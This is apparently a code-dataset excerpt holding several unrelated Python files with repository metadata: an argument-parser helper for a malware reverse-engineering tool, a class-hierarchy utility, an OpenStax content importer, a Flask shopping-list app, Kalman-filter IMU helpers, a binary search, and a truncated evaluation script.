| 44.142857 | 127 | 0.512046 | 359 | 2,781 | 3.72702 | 0.214485 | 0.088939 | 0.060538 | 0.068012 | 0.352018 | 0.268311 | 0.238416 | 0.161435 | 0.082212 | 0.059791 | 0 | 0.004011 | 0.372528 | 2,781 | 62 | 128 | 44.854839 | 0.762751 | 0.036318 | 0 | 0.173077 | 0 | 0 | 0.141524 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.076923 | 0 | 0.134615 | 0.192308 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3918401a1115c32350535dad538e1deab5215e1f | 1,327 | py | Python | boa/argparse.py | malice-labs/boa | 49c1fd24e2050f8e08409a6871b7e30c6d1e27f7 | [
"MIT"
] | 3 | 2020-08-10T04:24:45.000Z | 2022-03-16T07:22:11.000Z | boa/argparse.py | malice-labs/boa | 49c1fd24e2050f8e08409a6871b7e30c6d1e27f7 | [
"MIT"
] | 15 | 2020-08-09T22:01:32.000Z | 2022-03-18T04:15:53.000Z | boa/argparse.py | malice-labs/boa | 49c1fd24e2050f8e08409a6871b7e30c6d1e27f7 | [
"MIT"
] | 2 | 2021-02-04T16:25:57.000Z | 2021-12-20T20:07:58.000Z | """
argparse.py
Argument parser helper for both the UWSGI runner and CLI
Credits: https://mike.depalatis.net/blog/simplifying-argparse.html
"""
import sys
import argparse
HEADER = """
___.
\_ |__ _________
| __ \ / _ \__ \
| \_\ ( <_> ) __ \_
|___ /\____(____ /
\/ \/
Reverse Engineering Framework for Python-Compiled Malware/Apps
"""
# globally instantiated parser for simplified subcommand parsing
cli = argparse.ArgumentParser(
description="Python Malware/App Reverse Engineering Framework"
)
subparsers = cli.add_subparsers(dest="subcommand")
def argument(*name_or_flags, **kwargs):
""" Helper method to format arguments for subcommand decorator """
return (list(name_or_flags), kwargs)
def subcommand(args=[], parent=subparsers):
""" Implements decorator for instantiating subcommand. """
def decorator(func):
parser = parent.add_parser(func.__name__, description=func.__doc__)
for arg in args:
parser.add_argument(*arg[0], **arg[1])
parser.set_defaults(func=func)
return decorator
def parse_args():
""" Entry for argument parsing """
args = cli.parse_args()
if args.subcommand is None:
cli.print_help()
else:
print(HEADER)
sys.exit(args.func(args))
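
# Editorial usage sketch (hypothetical subcommand, in the spirit of the
# credited blog post):
#   @subcommand([argument("target", help="binary to inspect")])
#   def detect(args):
#       """Identify how the target was packed/compiled."""
#       ...
# parse_args() then dispatches `<prog> detect <target>` to detect(args).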
| 25.037736 | 75 | 0.654861 | 144 | 1,327 | 5.652778 | 0.513889 | 0.044226 | 0.066339 | 0.041769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001955 | 0.229088 | 1,327 | 52 | 76 | 25.519231 | 0.793744 | 0.262999 | 0 | 0 | 0 | 0 | 0.271008 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129032 | false | 0 | 0.064516 | 0 | 0.258065 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39190f6f95541bce0a5214eb986ad0051aecedc4 | 2,420 | py | Python | HierStack/hierarchy.py | manisa/ClassifyTE | e186a6a6d4fcc4f6a9fc3ccc234f66c58a3d1b93 | [
"MIT"
] | 11 | 2020-09-24T02:12:22.000Z | 2022-03-11T09:55:08.000Z | HierStack/hierarchy.py | manisa/ClassifyTE | e186a6a6d4fcc4f6a9fc3ccc234f66c58a3d1b93 | [
"MIT"
] | 2 | 2020-09-24T02:17:53.000Z | 2021-03-10T00:59:47.000Z | HierStack/hierarchy.py | manisa/ClassifyTE | e186a6a6d4fcc4f6a9fc3ccc234f66c58a3d1b93 | [
"MIT"
] | 3 | 2021-04-08T05:45:36.000Z | 2021-12-30T19:18:15.000Z | import networkx as nx
import pandas as pd
import numpy as np
class hierarchy:
    G=nx.DiGraph()

    def __init__(self,nodes):
        self.G.add_node('0', depth = 0)
        n = open(nodes,'r')
        for line in n.readlines():
            self.get_nodes(line.strip())

    def get_nodes(self,line):
        node_name=""
        edge_name=""
        nodes = []
        edges = []
        edges.append(['0',line.split('.')[0]])
        for i in line.split('.'):
            node_name+= i
            self.G.add_node(node_name, depth = len(node_name.split('.')))
            node_name+= '.'
        aux = []
        edge_name=line.split('.')[0]
        aux.append(edge_name)
        for i in range(len(line.split('.'))-1):
            edge_name+= '.'
            edge_name+= line.split('.')[i+1]
            aux.append(edge_name)
            edges.append(aux)
            aux = []
            aux.append(edge_name)
        self.G.add_edges_from(edges)

    def stats(self):
        for i in range(self.getHeight()+1):
            print('level' + str(i))
            print(self.getNodesByLevel(i))
            print(len(self.getNodesByLevel(i)))

    def removeNonLeafs(self,df):
        non_leafs = set(self.G.nodes())-set(self.getLeafs())
        df2 = pd.DataFrame.copy(df)
        for i in non_leafs:
            df2 = df2[df2.classification != i]
        return(df2)

    def getLeafs(self):
        leafs = []
        for node in self.G.nodes():
            if not self.G.neighbors(node):
                leafs.append(node)
        return(set(leafs))

    def getHeight(self):
        return(max([y['depth'] for x,y in self.G.nodes(data=True)]))

    def getNodesByLevel(self,depth):
        return([x for x,y in self.G.nodes(data=True) if y['depth']==depth])

    def getInnerNodes(self,root,desc):
        for node in self.G.neighbors(root):
            if self.G.neighbors(node):
                desc.append(node)
                self.getInnerNodes(node,desc)

    def getDataFromInnerNodes(self,df):
        desc = []
        self.getInnerNodes('0',desc)
        desc.append('0')
        data = {}
        for node in desc:
            data[node] = self.getDataByParent(node,df)
        return(data)
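
    # Editorial note: the truthiness tests on self.G.neighbors(...) in
    # getLeafs() and getInnerNodes() assume networkx 1.x, where neighbors()
    # returned a list; on networkx >= 2.0 it returns an iterator that is
    # always truthy, so they would need list(self.G.neighbors(node)) instead.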
    def getDataByParent(self,parentNode,df):
        df2 = pd.DataFrame.copy(df)
        if (df2['classification'] == parentNode).any():
            df2.loc[df2['classification']==parentNode, 'classification'] = '#' + parentNode
        for i in self.G.neighbors(parentNode):
            df2.loc[df2.classification.str.startswith(i + "."),'classification'] = str(i)
        for i in set(self.G.nodes())- set(self.G.neighbors(parentNode)):
            df2 = df2[df2.classification!=i]
        df2 = df2.reset_index(drop=True)
        return(df2)

    def getDescendants(self,node):
| 30.632911 | 83 | 0.642975 | 356 | 2,420 | 4.300562 | 0.219101 | 0.045722 | 0.023514 | 0.033312 | 0.165251 | 0.058785 | 0.032658 | 0.032658 | 0.032658 | 0 | 0 | 0.013623 | 0.180992 | 2,420 | 78 | 84 | 31.025641 | 0.758829 | 0 | 0 | 0.142857 | 0 | 0 | 0.036721 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.038961 | 0.038961 | 0.207792 | 0.038961 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3919b6d798e6bab79283dcfc695bccf752daf541 | 12,058 | py | Python | sushichef.py | learningequality/sushi-chef-openstax | dea899fec6b090a1f7b0e1597f8260ca4c0b0f6f | [
"MIT"
] | null | null | null | sushichef.py | learningequality/sushi-chef-openstax | dea899fec6b090a1f7b0e1597f8260ca4c0b0f6f | [
"MIT"
] | 4 | 2017-09-25T19:39:26.000Z | 2019-01-11T17:19:13.000Z | sushichef.py | learningequality/sushi-chef-openstax | dea899fec6b090a1f7b0e1597f8260ca4c0b0f6f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import copy
import os
import sys; sys.path.append(os.getcwd())  # Handle relative imports
from ricecooker.utils import downloader, html_writer
from ricecooker.chefs import SushiChef
from ricecooker.classes import nodes, files
from ricecooker.config import LOGGER # Use logger to print messages
from ricecooker.exceptions import raise_for_invalid_channel
""" Additional imports """
###########################################################
import logging
import json
from le_utils.constants import licenses, file_formats, roles
from bs4 import BeautifulSoup
import cssutils
from utils.pdf import PDFParser
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPM
""" Run Constants"""
###########################################################
CHANNEL_NAME = "Open Stax" # Name of channel
CHANNEL_SOURCE_ID = "open-stax" # Channel's unique id
CHANNEL_DOMAIN = "openstax.org" # Who is providing the content
CHANNEL_LANGUAGE = "en" # Language of channel
CHANNEL_DESCRIPTION = None # Description of the channel (optional)
CHANNEL_THUMBNAIL = "https://pbs.twimg.com/profile_images/461533721493897216/Q-kxGJ-b_400x400.png" # Local path or url to image file (optional)
""" Additional Constants """
###########################################################
BASE_URL = "https://openstax.org/api"
DOWNLOAD_DIRECTORY = os.path.sep.join([os.path.dirname(os.path.realpath(__file__)), "downloads"])
THUMBNAILS_DIRECTORY = os.path.sep.join([os.path.dirname(os.path.realpath(__file__)), "downloads", "thumbnails"])
# Create download directory if it doesn't already exist
if not os.path.exists(DOWNLOAD_DIRECTORY):
    os.makedirs(DOWNLOAD_DIRECTORY)

# Create thumbnails directory if it doesn't already exist
if not os.path.exists(THUMBNAILS_DIRECTORY):
    os.makedirs(THUMBNAILS_DIRECTORY)

# Map for Open Stax licenses to le_utils license constants
LICENSE_MAPPING = {
    "Creative Commons Attribution License": licenses.CC_BY,
    "Creative Commons Attribution-NonCommercial-ShareAlike License": licenses.CC_BY_NC_SA,
}
COPYRIGHT_HOLDER = "Rice University"
""" The chef class that takes care of uploading channel to the content curation server. """
class MyChef(SushiChef):
    channel_info = { # Channel Metadata
        'CHANNEL_SOURCE_DOMAIN': CHANNEL_DOMAIN, # Who is providing the content
        'CHANNEL_SOURCE_ID': CHANNEL_SOURCE_ID, # Channel's unique id
        'CHANNEL_TITLE': CHANNEL_NAME, # Name of channel
        'CHANNEL_LANGUAGE': CHANNEL_LANGUAGE, # Language of channel
        'CHANNEL_THUMBNAIL': CHANNEL_THUMBNAIL, # Local path or url to image file (optional)
        'CHANNEL_DESCRIPTION': CHANNEL_DESCRIPTION, # Description of the channel (optional)
    }

    """ Main scraping method """
    ###########################################################
    def construct_channel(self, *args, **kwargs):
        """ construct_channel: Creates ChannelNode and build topic tree

            OpenStax is organized with the following hierarchy:
                Subject (Topic)
                |   Book (Topic)
                |   |   Main High Resolution PDF (DocumentNode)
                |   |   Main Low Resolution PDF (DocumentNode)
                |   |   Instructor Resources (Topic)
                |   |   |   Resource PDF (DocumentNode)
                |   |   Student Resources (Topic)
                |   |   |   Resource PDF (DocumentNode)

            Returns: ChannelNode
        """
        LOGGER.info("Constructing channel from {}...".format(BASE_URL))

        channel = self.get_channel(*args, **kwargs) # Creates ChannelNode from data in self.channel_info

        contents = read_source() # Get json data from page
        for book in contents.get('books'):
            subject = book.get('subject')

            # Get subject, add if not available
            subject_node = next((child for child in channel.children if child.source_id == subject), None)
            if not subject_node:
                subject_node = nodes.TopicNode(source_id=subject, title=subject)
                channel.add_child(subject_node)

            content = read_source(endpoint=book.get('slug')) # Read detailed page for content
            if not content: # Skip to next item if nothing is found
                continue

            # Format licensing metadata for content
            auth_info = {
                "license": LICENSE_MAPPING[content.get('license_name')],
                "license_description": content.get('license_text'),
                "copyright_holder": COPYRIGHT_HOLDER,
            }

            # Format content metadata for content
            authors = ", ".join([a['value']['name'] for a in content['authors'][:5]])
            authors = authors + " et. al." if len(content['authors']) > 5 else authors
            details = {
                "description": parse_description(content.get('description')),
                "thumbnail": get_thumbnail(content.get('cover_url')),
                "author": authors,
            }

            # Add book topic
            book_node = nodes.TopicNode(
                source_id=str(content.get('cnx_id')),
                title=content.get('title'),
                description=details.get('description'),
                thumbnail=details.get('thumbnail'),
            )
            subject_node.add_child(book_node)

            # Create high resolution document
            LOGGER.info(" Writing {} documents...".format(book.get('title')))
            add_file_node(book_node, content.get("low_resolution_pdf_url") or content.get("high_resolution_pdf_url"), \
                content['title'], split=True, contents=content['table_of_contents']['contents'], **auth_info, **details)

            # Create student handbook document
            if content.get("student_handbook_url"):
                add_file_node(book_node, content["student_handbook_url"], "Student Handbook", source_id="student-handbook", **auth_info, **details)

            # Parse resource materials
            LOGGER.info(" Writing {} resources...".format(book.get('title')))
            parse_resources("Instructor Resources", content.get('book_faculty_resources'), book_node, role=roles.COACH, **auth_info)
            parse_resources("Student Resources", content.get('book_student_resources'), book_node, **auth_info)

        raise_for_invalid_channel(channel) # Check for errors in channel construction

        return channel
""" Helper Methods """
###########################################################
def read_source(endpoint="books"):
""" Reads page source using downloader class to get json data """
page_contents = downloader.read("{baseurl}/{endpoint}".format(baseurl=BASE_URL, endpoint=endpoint))
return json.loads(page_contents) # Open Stax url returns json object
def get_thumbnail(url):
filename, _ext = os.path.splitext(os.path.basename(url))
img_path = os.path.sep.join([THUMBNAILS_DIRECTORY, "{}.png".format(filename)])
svg_path = os.path.sep.join([THUMBNAILS_DIRECTORY, "{}.svg".format(filename)])
# This thumbnail gets converted with an error, so download it separately for now
if "US_history" in filename:
return files.ThumbnailFile(path="US_history.png")
# Copy pngs to local storage
if url.endswith("png"):
with open(img_path, 'wb') as pngobj:
pngobj.write(downloader.read(url))
elif url.endswith("svg"):
with open(svg_path, 'wb') as svgobj:
# renderPM doesn't read <style> tags, so add style to individual elements
svg_contents = BeautifulSoup(downloader.read(url), 'html.parser')
svg_contents = BeautifulSoup(svg_contents.find('svg').prettify(), 'html.parser')
if svg_contents.find('style'):
sheet = cssutils.parseString(svg_contents.find('style').string)
for rule in sheet:
rectangles = svg_contents.find_all('rect', {'class': rule.selectorText.lstrip('.')})
paths = svg_contents.find_all('path', {'class': rule.selectorText.lstrip('.')})
polygons = svg_contents.find_all('polygon', {'class': rule.selectorText.lstrip('.')})
for el in rectangles + paths + polygons:
el['style'] = ""
for prop in rule.style:
el['style'] += "{}:{};".format(prop.name, prop.value)
# Beautifulsoup autocorrects some words to be all lowercase, so undo correction
autocorrected_fields = ["baseProfile", "viewBox"]
svg = svg_contents.find('svg')
for field in autocorrected_fields:
if svg.get(field.lower()):
svg[field] = svg[field.lower()]
del svg[field.lower()]
svgobj.write(svg_contents.renderContents())
drawing = svg2rlg(svg_path)
renderPM.drawToFile(drawing, img_path)
else:
import pdb; pdb.set_trace()
return files.ThumbnailFile(path=img_path)
def parse_description(description):
""" Removes html tags from description """
return BeautifulSoup(description or "", "html5lib").text
def parse_resources(resource_name, resource_data, book_node, **auth_info):
""" Creates resource topics """
resource_data = resource_data or []
resource_str = "{}-{}".format(book_node.source_id, resource_name.replace(' ', '-').lower())
# Create resource topic
resource_node = nodes.TopicNode(source_id=resource_str, title=resource_name)
book_node.add_child(resource_node)
# Add resource documents
for resource in resource_data:
if resource.get('link_document_url') and resource['link_document_url'].endswith(".pdf"):
description = parse_description(resource.get('resource_description'))
add_file_node(resource_node, resource.get("link_document_url"), resource.get('resource_heading'), description=description, **auth_info)
JSONDATA = {}
with open("pages.json", "rb") as jsonfile:
JSONDATA = json.load(jsonfile)
def add_file_node(target_node, url, title, split=False, contents=None, source_id=None, **details):
""" Creates file nodes at target topic node """
if split:
book_node = nodes.TopicNode(
source_id=source_id or target_node.source_id + "-main",
title=title,
description=details.get('description'),
thumbnail=details.get('thumbnail'),
)
target_node.add_child(book_node)
chapters = []
chapter_details = copy.deepcopy(details)
del chapter_details['description']
with PDFParser(url, directory=DOWNLOAD_DIRECTORY) as parser:
chapters = parser.split_chapters(jsondata=JSONDATA.get(book_node.source_id))
for index, chapter in enumerate(chapters):
source_id = contents[index]['id'] if index < len(contents) else "{}-{}".format(book_node.source_id, index)
create_document_node(chapter['path'], chapter['title'], book_node, source_id, **chapter_details)
else:
create_document_node(url, title, target_node, source_id or target_node.source_id, **details)
def create_document_node(path, title, target_node, source_id, **details):
document_file = files.DocumentFile(path)
document_id = title.replace(" ", "-").lower()
target_node.add_child(nodes.DocumentNode(
source_id="{}-{}".format(source_id, document_id),
title=title,
files=[document_file],
**details
))
""" This code will run when the sushi chef is called from the command line. """
if __name__ == '__main__':
chef = MyChef()
chef.main() | 44.659259 | 147 | 0.619423 | 1,331 | 12,058 | 5.435011 | 0.246431 | 0.02433 | 0.013271 | 0.007188 | 0.160354 | 0.102018 | 0.077965 | 0.060271 | 0.051147 | 0.033177 | 0 | 0.003319 | 0.250373 | 12,058 | 270 | 148 | 44.659259 | 0.796991 | 0.159977 | 0 | 0.059172 | 0 | 0 | 0.133669 | 0.015625 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04142 | false | 0 | 0.100592 | 0 | 0.183432 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
391af0070ec9aa055f9fe705531d28f9338b23ac | 1,966 | py | Python | __init__.py | carlosnavarro25/ListadeSuper | 7ed3779ed21bd4ff6decff24050e196f4ffd4af3 | [
"MIT"
] | null | null | null | __init__.py | carlosnavarro25/ListadeSuper | 7ed3779ed21bd4ff6decff24050e196f4ffd4af3 | [
"MIT"
] | null | null | null | __init__.py | carlosnavarro25/ListadeSuper | 7ed3779ed21bd4ff6decff24050e196f4ffd4af3 | [
"MIT"
] | null | null | null | from flask import Flask, request, flash
from flask import render_template
from flask import redirect
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///listasuper.sqlite3'
app.config['SECRET_KEY'] = 'uippc3'
db = SQLAlchemy(app)

class Super(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    content = db.Column(db.String)
    cantidad = db.Column(db.Integer)
    precio = db.Column(db.Float)
    listo = db.Column(db.Boolean, default=False)

    def __init__(self, content, precio, cantidad):
        self.content = content
        self.precio = precio
        self.cantidad = cantidad
        self.listo = False

db.create_all()
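
# Illustrative usage sketch (not part of the original app; the item values are
# made up). Rows follow the usual Flask-SQLAlchemy pattern:
#   item = Super('Leche', 25.50, 2)   # content, precio, cantidad
#   db.session.add(item)
#   db.session.commit()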

@app.route('/')
def supers_list():
    supers = Super.query.all()
    return render_template('mostrar_todo.html', supers=supers)

@app.route('/super', methods=['POST'])
def add_super():
    content = request.form.get('content')
    precio = request.form.get('precio')
    cantidad = request.form.get('cantidad')
    if not request.form['content'] or not request.form['precio']:
        flash('Debes ingresar un texto')  # "You must enter a text"
        return redirect('/')
    super = Super(content, precio, cantidad)
    db.session.add(super)
    db.session.commit()
    flash('Registro guardado con exito!')  # "Record saved successfully!"
    return redirect('/')

@app.route('/delete/<int:super_id>')
def delete_super(super_id):
    super = Super.query.get(super_id)
    if not super:
        return redirect('/')
    db.session.delete(super)
    db.session.commit()
    flash('Se borro con exito!')  # "Deleted successfully!"
    return redirect('/')

@app.route('/listo/<int:super_id>')
def resolve_super(super_id):
    super = Super.query.get(super_id)
    if not super:
        return redirect('/')
    if super.listo:
        super.listo = False
    else:
        super.listo = True
    db.session.commit()
    return redirect('/')

app.static_folder = 'static'

if __name__ == '__main__':
    db.create_all()
    app.run() | 23.97561 | 70 | 0.660732 | 255 | 1,966 | 4.94902 | 0.309804 | 0.066561 | 0.03962 | 0.026941 | 0.183835 | 0.144216 | 0.096672 | 0.096672 | 0.096672 | 0.096672 | 0 | 0.001267 | 0.196846 | 1,966 | 82 | 71 | 23.97561 | 0.797973 | 0 | 0 | 0.245902 | 0 | 0 | 0.133198 | 0.047789 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081967 | false | 0 | 0.065574 | 0 | 0.360656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
391b9c72800385ae9692b6e6dd7debb52f9635d1 | 4,309 | py | Python | utils.py | jinhwanlazy/kalman-filter-isnt-hard | 7db92bda639761b41be505596b1708b83aa8fa3f | [
"Unlicense"
] | null | null | null | utils.py | jinhwanlazy/kalman-filter-isnt-hard | 7db92bda639761b41be505596b1708b83aa8fa3f | [
"Unlicense"
] | null | null | null | utils.py | jinhwanlazy/kalman-filter-isnt-hard | 7db92bda639761b41be505596b1708b83aa8fa3f | [
"Unlicense"
] | null | null | null | import scipy.io
from matplotlib import pyplot as plt
import numpy as np
def load_imu_data():
    dt = 0.01
    gyro_data = scipy.io.loadmat('./source/11.ARS/ArsGyro.mat')
    acce_data = scipy.io.loadmat('./source/11.ARS/ArsAccel.mat')
    ts = np.arange(len(gyro_data['wz'])) * dt
    gyro = np.concatenate([
        gyro_data['wx'],
        gyro_data['wy'],
        gyro_data['wz'],
    ], axis=1)
    acce = np.concatenate([
        acce_data['fx'],
        acce_data['fy'],
        acce_data['fz'],
    ], axis=1)
    return dt, ts, gyro, acce

def load_sonar_data():
    sonar_data = scipy.io.loadmat('./source/2.MovAvgFilter/SonarAlt.mat')['sonarAlt'].reshape(-1)[:500]
    dt = 0.02
    ts = np.arange(len(sonar_data)) * dt
    return dt, ts, sonar_data[:500]

def generate_volt_data():
    while True:
        yield np.random.normal(14.4, 4)

def generate_pos_vel_data(dt=0.1):
    pos = 0
    vel = 80
    while True:
        w = np.random.normal(0, 10)
        v = np.random.normal(0, 10)
        pos += vel * dt
        yield pos + v, vel
        vel = 80 + w

def generate_radar_measurement_data(dt):
    pos = 0
    while True:
        vel = np.random.normal(100, 5)
        alt = np.random.normal(1000, 10)
        pos = pos + vel * dt
        v = np.random.normal(0, pos * 0.05)
        r = (pos**2 + alt**2)**0.5 + v
        yield r

def run_radar_position_estimation(kf, ts, measurements_seq):
    measurements = []
    estimations = []
    speeds = []
    altitudes = []
    positions = []
    for t, meas in zip(ts, measurements_seq):
        kf.update(np.array([[meas]]))
        state = kf.x.copy()
        measurements.append(meas)
        estimations.append(kf.h(state)[0, 0])
        pos, spd, alt = state.reshape(3)
        positions.append(pos)
        speeds.append(spd)
        altitudes.append(alt)
    return measurements, estimations, speeds, altitudes, positions

def run_euler_attitude_estimation(kf, ts, gyro, acce):
    estimations = []
    for i, (g, a) in enumerate(zip(gyro, euler_from_acce(acce))):
        kf.gyro = g.reshape(3, 1)
        kf.update(a[:2].reshape(2, 1))
        estimations.append(kf.get().reshape(1, 2))
    return np.concatenate(estimations) * 180 / np.pi

def plot_xyz(ts, xyz, title=''):
    fig = plt.figure(figsize=[16, 12])
    fig.suptitle(title)
    for i, ax, color in zip(range(xyz.shape[1]), 'xyz', 'rgb'):
        fig.add_subplot(3, 1, i+1)
        plt.plot(ts, xyz[:, i], color=color)
        plt.ylabel(ax)
    plt.xlabel('Time[sec]')
    plt.show()

def plot_radar_result(ts, speeds, altitudes, positions):
    def plot(ts, values, ylabel):
        plt.figure(figsize=[12, 6])
        plt.plot(ts, values)
        plt.xlabel('Time[sec]')
        plt.ylabel(ylabel)
        plt.show()
    plot(ts, speeds, 'Speed[m/s]')
    plot(ts, altitudes, 'Altitude[m]')
    plot(ts, positions, 'Position[m]')

def plot_measurement_vs_estimation(ts, measurements, estimations, ylabel=''):
    plt.figure(figsize=[12, 9])
    plt.plot(ts, measurements, '--', label='measured')
    plt.plot(ts, estimations, label='estimated')
    plt.xlabel('Time[sec]')
    plt.ylabel(ylabel)
    plt.legend()
    plt.show()

def euler_from_gyro(ts, gyro):
    attitude = np.array([[0, 0, 0]]).T
    res = np.zeros((len(ts), 3), dtype=float)
    for i, (dt, pqr) in enumerate(zip(ts[1:] - ts[:-1], gyro)):
        phi, theta, _ = attitude.reshape(-1)
        sin_phi = np.sin(phi)
        cos_phi = np.cos(phi)
        cos_theta = np.cos(theta)
        tan_theta = np.tan(theta)
        # standard body-rate to Euler-rate map; the last row uses sec(theta)
        to_euler = np.array([
            [1, sin_phi * tan_theta, cos_phi * tan_theta],
            [0, cos_phi, -sin_phi],
            [0, sin_phi / cos_theta, cos_phi / cos_theta],
        ])
        attitude = attitude + dt * to_euler @ pqr.reshape(3, 1)
        res[i+1] = attitude.reshape(-1)
    return res

def euler_from_acce(acce):
    g = 9.8
    theta = np.arcsin(acce[:, 0] / g)
    phi = np.arcsin(-acce[:, 1] / (g * np.cos(theta)))
    return np.stack([phi, theta, np.zeros_like(phi)], axis=1)

def euler_from_acce2(acce):
    x, y, z = acce.T
    phi = np.arctan2(y, z)
    theta = np.arctan2(x, (y**2 + z**2)**0.5)
    return np.stack([phi, theta, np.zeros_like(phi)], axis=1)
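
# Illustrative sanity check (not part of the original module): a stationary,
# level IMU measures only gravity along z, and both accelerometer-based
# estimators then return zero roll and pitch.
#   acce = np.array([[0.0, 0.0, 9.8]])
#   euler_from_acce(acce)   -> [[0., 0., 0.]]   (theta = arcsin(0), phi = arcsin(-0))
#   euler_from_acce2(acce)  -> [[0., 0., 0.]]   (arctan2(0, 9.8) = 0 for both angles)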
| 26.598765 | 103 | 0.571362 | 625 | 4,309 | 3.8336 | 0.248 | 0.020033 | 0.035058 | 0.022538 | 0.184474 | 0.085977 | 0.085977 | 0.06177 | 0.033389 | 0.033389 | 0 | 0.034777 | 0.265955 | 4,309 | 161 | 104 | 26.763975 | 0.722732 | 0 | 0 | 0.155738 | 0 | 0 | 0.045718 | 0.021119 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.02459 | 0 | 0.196721 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
391c545fe97dbf90b53cd05bbc8214ed5d823aa1 | 1,119 | py | Python | interval_search/binary_search.py | mmore500/interval-search | c03f14cbd51770ff4a6abf8f627028c4961368fd | [
"MIT"
] | null | null | null | interval_search/binary_search.py | mmore500/interval-search | c03f14cbd51770ff4a6abf8f627028c4961368fd | [
"MIT"
] | null | null | null | interval_search/binary_search.py | mmore500/interval-search | c03f14cbd51770ff4a6abf8f627028c4961368fd | [
"MIT"
] | null | null | null | import typing
def binary_search(
    predicate: typing.Callable[[int], bool],
    lower_bound: int,
    upper_bound: int,
) -> typing.Optional[int]:
    """
    Find the positive integer threshold below which a search criteria is never
    satisfied and above which it is always satisfied.

    Parameters
    ----------
    predicate : callable object
        Returns whether an integer value satisfies the search criteria.
    lower_bound : int
        Lower bound for the binary search, inclusive.
    upper_bound : int
        Upper bound for the binary search, inclusive.

    Returns
    -------
    guess
        The lowest integer value that satisfies the search criteria, or None
        if upper_bound does not satisfy the search criteria.
    """
    if lower_bound == upper_bound:
        if predicate(lower_bound):
            return lower_bound
        else:
            return None

    midpoint = (lower_bound + upper_bound) // 2
    if predicate(midpoint):
        return binary_search(predicate, lower_bound, midpoint)
    else:
        return binary_search(predicate, midpoint + 1, upper_bound)
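
# Illustrative usage (not part of the original module; the predicate is made
# up). The predicate must be monotonic: False below some threshold and True at
# and above it. For example, the smallest integer whose square reaches 50:
#
#   >>> binary_search(lambda value: value * value >= 50, 0, 100)
#   8
#
# binary_search(lambda value: value > 100, 0, 100) returns None, because even
# the upper bound fails the predicate.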
| 27.292683 | 78 | 0.65773 | 134 | 1,119 | 5.373134 | 0.380597 | 0.111111 | 0.0875 | 0.05 | 0.088889 | 0.088889 | 0 | 0 | 0 | 0 | 0 | 0.002451 | 0.270777 | 1,119 | 40 | 79 | 27.975 | 0.879902 | 0.476318 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
39224edae2c8c9217adba82e613f3d788595f00d | 2,482 | py | Python | tools/eval2txt.py | youshyee/Greatape-Detection | 333b63d8f76538659bcd2bc6022128830a7a435b | [
"Apache-2.0"
] | 1 | 2019-09-22T16:47:16.000Z | 2019-09-22T16:47:16.000Z | tools/eval2txt.py | youshyee/Greatape-Detection | 333b63d8f76538659bcd2bc6022128830a7a435b | [
"Apache-2.0"
] | null | null | null | tools/eval2txt.py | youshyee/Greatape-Detection | 333b63d8f76538659bcd2bc6022128830a7a435b | [
"Apache-2.0"
] | null | null | null | '''
given a working dir,
calculate the result for each epoch saving and save it as a txt file
'''
import os
import mmcv
import argparse
import os.path as osp
import shutil
import tempfile
import torch
import torch.distributed as dist
from mmcv.runner import load_checkpoint, get_dist_info
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmdet.apis import init_dist
from mmdet.core import results2json, coco_eval
from mmdet.datasets import build_dataloader, get_dataset
from mmdet.models import build_detector
import subprocess
files=os.listdir('/mnt/storage/home/rn18510/')
folders=[f for f in files if 'slurm_mm' in f]
all_shfiles=[]
for folder in folders:
